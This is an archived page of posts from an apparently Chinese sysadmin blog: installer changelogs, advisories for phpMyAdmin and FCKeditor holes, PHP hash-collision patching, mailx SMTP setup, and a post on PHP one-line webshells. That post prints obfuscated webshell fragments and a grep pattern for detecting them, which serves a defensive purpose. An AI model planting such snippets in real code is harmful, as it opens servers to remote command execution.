Skip to content

Lempelf一键安装包更新1.0.3

Lempelf一键安装包是什么?

Lempelf一键安装包是用Shell编写的在Linux平台快速安装常用服务的Shell程序。

ChangeLog 主要修复1.0.3的bug

2012-3-28 发布Lempelf 1.0.3 Bugfix:awstats安装完成后的提示域名地址 Bugfix:nginx安装失败 ./scripts/setup_nginx.sh 第21行文件名修正 Bugfix:php启动时找不到mysqlclient.so.18 (echo “/opt/mysql/lib” > /etc/ld.so.conf.d/mysql.conf && ldconfig) Bugfix:64位下secure日志中的PAM错误 修改/etc/pam.d/su 中路径 Bugfix:centos6的tty,ctrl+alt+del,ipv6 Bugfix:限制可以su的用户 需要su的用户需用gpasswd 添加到组 Change:nginx日志改为保留1月 Feature:新增scripts/firstlog.sh 用于生成文件及运行信息供日后对比

2012-3-23 发布Lempelf 1.0.2 php的magic_quotes_gpc 设为on yum增加cmake mysql升级为Percona-Server-5.5.20-rel24.1 增加/tmp/mysql.sock软链接 php升级成5.2.17并打上hash补丁 隐藏nginx版本号为1.0 nginx.conf中隐藏版本号 修改autosafe.sh中自动运行的服务 升级pcre到pcre-8.30 phpmyadmin更新至phpMyAdmin-3.4.10.1-all-languages

2012-3-28 16:00再次更新 2012-3-30 14:30再次更新 2012-3-30 18:00再次更新

https://blog.c1gstudio.com/lempelfpage

Posted in Lempelf一键包.

Tagged with .

rev="post-1340" No comments

By C1G 2012/03/28

Lempelf一键包更新 1.0.2

Lempelf一键安装包是什么?

Lempelf一键安装包是用Shell编写的在Linux平台快速安装常用服务的Shell程序。

ChangeLog 主要提升性能及安全

2012-3-23 发布Lempelf 1.0.2 php的magic_quotes_gpc 设为on yum增加cmake mysql升级为Percona-Server-5.5.20-rel24.1 增加/tmp/mysql.sock软链接 php升级成5.2.17并打上hash补丁 隐藏nginx版本号为1.0 nginx.conf中隐藏版本号 修改autosafe.sh中自动运行的服务 升级pcre到pcre-8.30 phpmyadmin更新至phpMyAdmin-3.4.10.1-all-languages

https://blog.c1gstudio.com/lempelfpage

Posted in Lempelf一键包.

Tagged with .

rev="post-1332" No comments

By C1G 2012/03/23

phpMyAdmin 3.3.X and 3.4.X 含有注入漏洞

测试过受影响版本 phpmyadmin versions: 3.3.6, 3.3.10, 3.4.0, 3.4.5, 3.4.7

另3.0也有sql注入漏洞

目前最新稳定版为phpMyAdmin 3.4.10.1 注意升级 http://www.phpmyadmin.net/home_page/downloads.php

参考: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4107 http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection/

Posted in 安全通告.

Tagged with , .

rev="post-1325" No comments

By C1G 2012/03/23

PHP一句话木马及查杀

常见的木马基本上有如下特征 1.接收外部变量 常见如:$_GET,$_POST 更加隐蔽的$_FILES,$_REQUEST…

2.执行函数 获取数据后还需执行它 常见如:eval,assert,preg_replace 隐藏变种:

include($_POST[‘a’]); $hh = “p”.”r”.”e”.”g”.”_”.”r”.”e”.”p”.”l”.”a”.”c”.”e”; $hh(“/[discuz]/e”,$_POST[‘h’],”Access”); @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).'($b4dboy)’, ‘add’);

使用urldecode,gzinflate,base64_decode等加密函数

3.写入文件 获取更多的权限 如:copy,file_get_contents,exec

一般的建议是打开safe_mode 或使用disable_functions 等来提升安全性; 可能有些程序无法正常运行,基本的安全设置 php.ini中

expose_php = OFF register_globals = Off display_errors = Off cgi.fix_pathinfo=0 magic_quotes_gpc = On allow_url_fopen = Off allow_url_include = Off 配置open_basedir

查找木马脚本 查找隐藏特征码及入口可以找出大部分的木马.

#!/bin/bash findpath=./ logfile=findtrojan.log echo -e $(date +%Y-%m-%d_%H:%M:%S)” start\r” >>$logfile echo -e ‘============changetime list==========\r\n’ >> ${logfile} find ${findpath} -name “*.php” -ctime -3 -type f -exec ls -l {} \; >> ${logfile} echo -e ‘============nouser file list==========\r\n’ >> ${logfile} find ${findpath} -nouser -nogroup -type f -exec ls -l {} \; >> ${logfile} echo -e ‘============php one word trojan ==========\r\n’ >> ${logfile} find ${findpath} -name “*.php” -exec egrep -I -i -C1 -H ‘exec\(|eval\(|assert\(|system\(|passthru\(|shell_exec\(|escapeshellcmd\(|pcntl_exec\(|gzuncompress\(|gzinflate\(|unserialize\(|base64_decode\(|file_get_contents\(|urldecode\(|str_rot13\(|\$_GET|\$_POST|\$_REQUEST|\$_FILES|\$GLOBALS’ {} \; >> ${logfile} #使用使用-l 代替-C1 -H 可以只打印文件名 echo -e $(date +%Y-%m-%d_%H:%M:%S)” end\r” >>$logfile more $logfile

Posted in 安全, 技术.

Tagged with , .

rev="post-1316" 2 comments

By C1G 2012/03/21

正则表达式口诀

正则其实也势利,削尖头来把钱揣; (指开始符号^和结尾符号$) 特殊符号认不了,弄个倒杠来引路; (指. *等特殊符号) 倒杠后面跟小w, 数字字母来表示; (w跟数字字母;\d跟数字) 倒杠后面跟小d, 只有数字来表示; 倒杠后面跟小a, 报警符号嘀一声; 倒杠后面跟小b, 单词分界或退格; 倒杠后面跟小t, 制表符号很明了; 倒杠后面跟小r, 回车符号知道了; 倒杠后面跟小s, 空格符号很重要; 小写跟罢跟大写,多得实在不得了; 倒杠后面跟大W, 字母数字靠边站; 倒杠后面跟大S, 空白也就靠边站; 倒杠后面跟大D, 数字从此靠边站; 倒框后面跟大B, 不含开头和结尾;

单个字符要重复,三个符号来帮忙; ( + ?) 0 星加1 到无穷,问号只管0 和1; (表0-n;+表1-n;?表0-1次重复) 花括号里学问多,重复操作能力强; ({n} {n,} {n,m}) 若要重复字符串,园括把它括起来; ((abc){3} 表示字符串“abc”重复3次 ) 特殊集合自定义,中括号来帮你忙; 转义符号行不通,一个一个来排队; 实在多得排不下,横杠请来帮个忙; ([1-5]) 尖头放进中括号,反义定义威力大; ([^a]指除“a”外的任意字符 ) 1竖作用可不小,两边正则互替换; (键盘上与“”是同一个键) 1竖能用很多次,复杂定义很方便; 园括号,用途多; 反向引用指定组,数字排符对应它; (“(\w+)\b\s+\1\b”中的数字“1”引用前面的“(\w+)”) 支持组名自定义,问号加上尖括号; (“(?

\w+)”中把“w+”定义为组,组名为“Word”) 园括号,用途多,位置指定全靠它; 问号等号字符串,定位字符串前面; (“\w+(?=ing\b)”定位“ing”前面的字符串) 若要定位串后面,中间插个小于号; (“(?

Posted in 文档理论.

Tagged with .

rev="post-1322" No comments

By C1G 2012/02/28

find搜索如何排除文件及目录

查找cache目录下不是html的文件

find ./cache ! -name ‘*.html’ -type f

列出当前目录下的目录名,排除includes目录,后面的-print不能少

find . -path ‘./includes’ -prune -o -type d -maxdepth 1 -print

2012-3-26更新 排除多个目录,”(“前是带”\”的

find / \( -path /home/ -o -path /root \) -prune -nouser -type f -exec ls -l {} \;

Posted in Linux 命令.

Tagged with .

rev="post-1320" No comments

By C1G 2012/02/24

linux下用mailx不启动Sendmail使用其它SMTP发邮件

可能服务器群已有专用邮件服务器不想在每台服务器上开启sendmail服务, 可以使用此方法让其它WEB服务器等调用,方便管理与维护.

1.首先需要一个SMTP邮件服务器 假设已有一台mail.c1gstudio.com邮件服务器

2.在本机的/etc/mail.rc 尾部输入

set [email protected] set smtp=mail.c1gstudio.com set smtp-auth=login set smtp-auth-user=mailuser set smtp-auth-password=mailpassword

3.发送邮件 mail -v -s “Hello ” [email protected] < /etc/hosts 收件人可以是多个人以","分割 -v是显示过程

Resolving host mail.c1gstudio.com . . . done. Connecting to 208.133.200.99 . . . connected. 220 Welcome to mail.c1gstudio.com ESMTP,Warning: Version not Available! >>> EHLO localhost 250-mta.mail.c1gstudio.com 250-PIPELINING 250-SIZE 10240000 250-VRFY 250-ETRN 250-AUTH LOGIN PLAIN 250-AUTH=LOGIN PLAIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN >>> AUTH LOGIN 334 xcvxcv >>> xc3xvsd== 334 f32fsdfwq >>> faddasdfaA== 235 2.0.0 Authentication successful >>> MAIL FROM: 250 2.1.0 Ok >>> RCPT TO: 250 2.1.5 Ok >>> DATA 354 End data with . >>> . 250 2.0.0 Ok: queued as A2E541C41D >>> QUIT 221 2.0.0 Bye

参考: http://kc1985.blog.51cto.com/2407758/537881

==================== 2012-4-10更新 以上测试是在centos6.0下运行没有问题,但在centos5.x上无法成功,为此放狗搜了半天无果 某天总算发现了差异,原来centos6上是Heirloom Mailx,在debian上用的多,yum search下没有.

centos5.8

mailx -V 8.1 6/6/93. Type ? for help. “/var/spool/mail/root”: 2 messages 2 new

centos6.0

mailx -V 12.4 7/29/08

找到问题就好办了 heirloom项目网址 http://sourceforge.net/projects/heirloom/ 目前最近版是mailx-12.4 1.安装mailx wget http://sourceforge.net/settings/mirror_choices?projectname=heirloom&filename=heirloom-mailx/12.4/mailx-12.4.tar.bz2 tar jxvf mailx-12.4.tar.bz2 cd mailx-12.4 make make install 出错

test -d /usr/local/bin || mkdir -p /usr/local/bin /usr/ucb/install -c mailx /usr/local/bin/mailx make: /usr/ucb/install: Command not found make: *** [install] Error 127

make install UCBINSTALL=/usr/bin/install

默认安装在 /usr/local/bin/mailx /etc/nail.rc 也可以自定义安装目录

make PREFIX=/opt/mailx SYSCONFDIR=/opt/mailx/etc

2.在本机的/etc/nail.rc 尾部输入 注意是nail.rc不是mail.rc

set [email protected] set smtp=mail.c1gstudio.com set smtp-auth=login set smtp-auth-user=mailuser set smtp-auth-password=mailpassword

3.切换到新mailx mv /bin/mail /bin/mail.OFF ln -s /usr/local/bin/mailx /bin/mail

4.测试 mail -v -s “new mailx ” [email protected] < /etc/hosts

Resolving host mail.c1gstudio.com . . . done. ….

========================== 2013-4-26更新 如出错找不到libiconv.so.2

mailx: error while loading shared libraries: libiconv.so.2: cannot open shar

可以查找下libiconv有无安装,再把lib目录放入/etc/ld.so.conf中 一般在/usr/local/lib/ echo ‘/usr/local/lib/’ >> /etc/ld.so.conf ldconfig -v

Posted in Mail/Postfix.

Tagged with , .

rev="post-1314" No comments

By C1G 2012/02/23

备份时遇到File size limit exceeded

用u盘备份文件时注意分区格式,通常使用的FAT32单文件最大为4G,超出时会遇到File size limit exceeded 错误.

Posted in 备份.

Tagged with .

rev="post-1312" No comments

By C1G 2012/02/14

Fckeditor<=2.4.2含上传漏洞

Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。

Upload a new file:

还有很有漏洞详见参考

参考: http://www.85815.com/article.asp?id=1320

Posted in 安全通告.

Tagged with .

rev="post-1310" No comments

By C1G 2012/02/09

给PHP5.2.*打上Hash冲突漏洞补丁

PHP5.2.通过构造Hash冲突可以实现拒绝服务攻击,针对此漏洞官方发布了PHP 5.3.9但不会为此发布PHP 5.2.18. 5.2. 可以打上下面的patch来解决此问题.

https://github.com/laruence/laruence.github.com/tree/master/php-5.2-max-input-vars

目前已知的受影响的语言以及版本有::

Java, 所有版本

JRuby <= 1.6.5

PHP <= 5.3.8, <= 5.4.0RC3

Python, 所有版本

Rubinius, 所有版本

Ruby <= 1.8.7-p356

Apache Geronimo, 所有版本

Apache Tomcat <= 5.5.34, <= 6.0.34, <= 7.0.22

Oracle Glassfish <= 3.1.1

Jetty, 所有版本

Plone, 所有版本

Rack, 所有版本

V8 JavaScript Engine, 所有版本

不受此影响的语言或者修复版本的语言有::

PHP >= 5.3.9, >= 5.4.0RC4

JRuby >= 1.6.5.1

Ruby >= 1.8.7-p357, 1.9.x

Apache Tomcat >= 5.5.35, >= 6.0.35, >= 7.0.23

Oracle Glassfish, N/A (Oracle reports that the issue is fixed in the main codeline and scheduled for a future CPU)

将php从5.2.14升级到5.2.17并打上补丁 下载patch https://github.com/laruence/laruence.github.com/zipball/master

到之前的php编译目录

cd src/lempelf/package/ wget http://www.php.net/get/php-5.2.17.tar.gz/from/kr.php.net/mirror wget http://php-fpm.org/downloads/php-5.2.17-fpm-0.5.14.diff.gz tar zxvf php-5.2.17.tar.gz gzip -cd php-5.2.17-fpm-0.5.14.diff.gz |patch -d php-5.2.17 -p1 patching file configure Hunk #7 succeeded at 110645 (offset 1324 lines). Hunk #9 succeeded at 119634 (offset 1324 lines). patching file configure.in patching file libevent/ChangeLog patching file libevent/Makefile.am patching file libevent/Makefile.in patching file libevent/README patching file libevent/aclocal.m4 patching file libevent/autogen.sh patching file libevent/buffer.c patching file libevent/compat/sys/_time.h patching file libevent/compat/sys/queue.h patching file libevent/config.h.in patching file libevent/configure patching file libevent/configure.in patching file libevent/depcomp patching file libevent/devpoll.c patching file libevent/epoll.c patching file libevent/epoll_sub.c patching file libevent/evbuffer.c patching file libevent/event-config.h patching file libevent/event-fpm.h patching file libevent/event-internal.h patching file libevent/event.3 patching file libevent/event.c patching file libevent/event.h patching file libevent/evhttp.h patching file libevent/evport.c patching file libevent/evsignal.h patching file libevent/evutil.c patching file libevent/evutil.h patching file libevent/http-internal.h patching file libevent/http.c patching file libevent/install-sh patching file libevent/kqueue.c patching file libevent/log.c patching file libevent/log.h patching file libevent/min_heap.h patching file libevent/missing patching file libevent/poll.c patching file libevent/select.c patching file libevent/signal.c patching file libevent/strlcpy-internal.h patching file libevent/strlcpy.c patching file main/php_config.h.in patching file sapi/cgi/Makefile.frag patching file sapi/cgi/cgi_main.c patching file sapi/cgi/config9.m4 patching file sapi/cgi/fastcgi.c patching file sapi/cgi/fastcgi.h patching file sapi/cgi/fpm/Makefile.frag patching file sapi/cgi/fpm/acinclude.m4 patching file sapi/cgi/fpm/conf/php-fpm.conf.in patching file sapi/cgi/fpm/config.m4 patching file sapi/cgi/fpm/fpm.c patching file sapi/cgi/fpm/fpm.h patching file sapi/cgi/fpm/fpm_arrays.h patching file sapi/cgi/fpm/fpm_atomic.h patching file sapi/cgi/fpm/fpm_autoconf.h.in patching file sapi/cgi/fpm/fpm_children.c patching file sapi/cgi/fpm/fpm_children.h patching file sapi/cgi/fpm/fpm_cleanup.c patching file sapi/cgi/fpm/fpm_cleanup.h patching file sapi/cgi/fpm/fpm_clock.c patching file sapi/cgi/fpm/fpm_clock.h patching file sapi/cgi/fpm/fpm_conf.c patching file sapi/cgi/fpm/fpm_conf.h patching file sapi/cgi/fpm/fpm_config.h patching file sapi/cgi/fpm/fpm_env.c patching file sapi/cgi/fpm/fpm_env.h patching file sapi/cgi/fpm/fpm_events.c patching file sapi/cgi/fpm/fpm_events.h patching file sapi/cgi/fpm/fpm_php.c patching file sapi/cgi/fpm/fpm_php.h patching file sapi/cgi/fpm/fpm_php_trace.c patching file sapi/cgi/fpm/fpm_php_trace.h patching file sapi/cgi/fpm/fpm_process_ctl.c patching file sapi/cgi/fpm/fpm_process_ctl.h patching file sapi/cgi/fpm/fpm_request.c patching file sapi/cgi/fpm/fpm_request.h patching file sapi/cgi/fpm/fpm_shm.c patching file sapi/cgi/fpm/fpm_shm.h patching file sapi/cgi/fpm/fpm_shm_slots.c patching file sapi/cgi/fpm/fpm_shm_slots.h patching file sapi/cgi/fpm/fpm_signals.c patching file sapi/cgi/fpm/fpm_signals.h patching file sapi/cgi/fpm/fpm_sockets.c patching file sapi/cgi/fpm/fpm_sockets.h patching file sapi/cgi/fpm/fpm_stdio.c patching file sapi/cgi/fpm/fpm_stdio.h patching file sapi/cgi/fpm/fpm_str.h patching file sapi/cgi/fpm/fpm_trace.c patching file sapi/cgi/fpm/fpm_trace.h patching file sapi/cgi/fpm/fpm_trace_mach.c patching file sapi/cgi/fpm/fpm_trace_pread.c patching file sapi/cgi/fpm/fpm_trace_ptrace.c patching file sapi/cgi/fpm/fpm_unix.c patching file sapi/cgi/fpm/fpm_unix.h patching file sapi/cgi/fpm/fpm_worker_pool.c patching file sapi/cgi/fpm/fpm_worker_pool.h patching file sapi/cgi/fpm/init.d/php-fpm.in patching file sapi/cgi/fpm/xml_config.c patching file sapi/cgi/fpm/xml_config.h patching file sapi/cgi/fpm/zlog.c patching file sapi/cgi/fpm/zlog.h unzip laruence-laruence.github.com-43969a1.zip cd php-5.2.17 patch -p1 patching file configure Hunk #1 succeeded at 2176 (offset 11 lines). patching file configure.in patching file main/main.c patching file main/php_globals.h patching file main/php_variables.c patching file main/php_version.h

打好补丁,重编译一遍php

./configure –prefix=/opt/php-5.2.17p1 –with-config-file-path=/opt/php-5.2.17p1/etc –with-mysql=/opt/mysql –with-mysqli=/opt/mysql/bin/mysql_config –with-iconv-dir=/usr/local –with-freetype-dir –with-jpeg-dir –with-png-dir –with-zlib –with-libxml-dir=/usr –disable-rpath –enable-discard-path –enable-safe-mode –enable-bcmath –enable-shmop –enable-sysvsem –enable-inline-optimization –with-curl –with-curlwrappers –enable-mbregex –enable-fastcgi –enable-fpm –enable-force-cgi-redirect –enable-mbstring –with-mcrypt –with-gd –enable-gd-native-ttf –with-openssl –with-mhash –enable-pcntl –enable-sockets –with-xmlrpc –enable-zip –enable-soap –enable-xml –enable-zend-multibyte –disable-debug –disable-ipv6 make ZEND_EXTRA_LIBS=’-liconv’ make install cd ../memcache-3.0.5 make clean /opt/php-5.2.17p1/bin/phpize ./configure –with-php-config=/opt/php-5.2.17p1/bin/php-config make make install cd ../eaccelerator-0.9.6.1 make clean /opt/php-5.2.17p1/bin/phpize ./configure –enable-eaccelerator=shared –with-php-config=/opt/php-5.2.17p1/bin/php-config make make install cd ../PDO_MYSQL-1.0.2 make clean /opt/php-5.2.17p1/bin/phpize ./configure –with-php-config=/opt/php-5.2.17p1/bin/php-config –with-pdo-mysql=/opt/mysql make make install cd ../imagick-2.2.2/ make clean /opt/php-5.2.17p1/bin/phpize ./configure –with-php-config=/opt/php-5.2.17p1/bin/php-config make make install #32位用下面 cp ../ZendOptimizer-3.3.9-linux-glibc23-i386/data/5_2_x_comp/ZendOptimizer.so /opt/php-5.2.17p1/lib/php/extensions/no-debug-non-zts-20060613/ #64位用下面 cp ../ZendOptimizer-3.3.9-linux-glibc23-x86_64/data/5_2_x_comp/ZendOptimizer.so /opt/php-5.2.17p1/lib/php/extensions/no-debug-non-zts-20060613/ mkdir -p /opt/php-5.2.17p1/eaccelerator_cache chown www:website /opt/php-5.2.17p1/eaccelerator_cache/ chmod 770 /opt/php-5.2.17p1/eaccelerator_cache/ touch /opt/php-5.2.17p1/logs/php_error.log chown www:website /opt/php-5.2.17p1/logs/php_error.log chmod 770 /opt/php-5.2.17p1/logs/php_error.log #升级pear (可选) /opt/php-5.2.17p1/bin/pear upgrade pear /opt/php-5.2.17p1/bin/pear install Benchmark Cache_Lite DB HTTP Mail Mail_Mime Net_SMTP Net_Socket Pager XML_Parser XML_RPC cp -p /opt/php/etc/php.ini /opt/php-5.2.17p1/etc/ cp -p /opt/php/etc/php-fpm.conf /opt/php-5.2.17p1/etc/ chown root:website /opt/php-5.2.17p1/etc/* chmod 660 /opt/php-5.2.17p1/etc/* /opt/php/sbin/php-fpm stop #删掉软连接,切换php rm /opt/php ln -s /opt/php-5.2.17p1/ /opt/php /opt/php/sbin/php-fpm start

注意phpfpm.conf,php.ini中的路径

找不到libmysqlclient.so.16

./conftest: error while loading shared libraries: libmysqlclient.so.16

echo /opt/mysql/lib/mysql >> /etc/ld.so.conf ldconfig -v

eAccelerator出错

[eAccelerator] This build of “eAccelerator” was compiled for PHP version 5.2.14. Rebuild it for your PHP version (5.2.17p1) or download precompiled binaries.

重新编译eAccelerator

参考: http://www.laruence.com/2011/12/29/2412.html

Posted in PHP, 安全, 安全通告.

Tagged with , .

rev="post-1307" No comments

By C1G 2012/01/12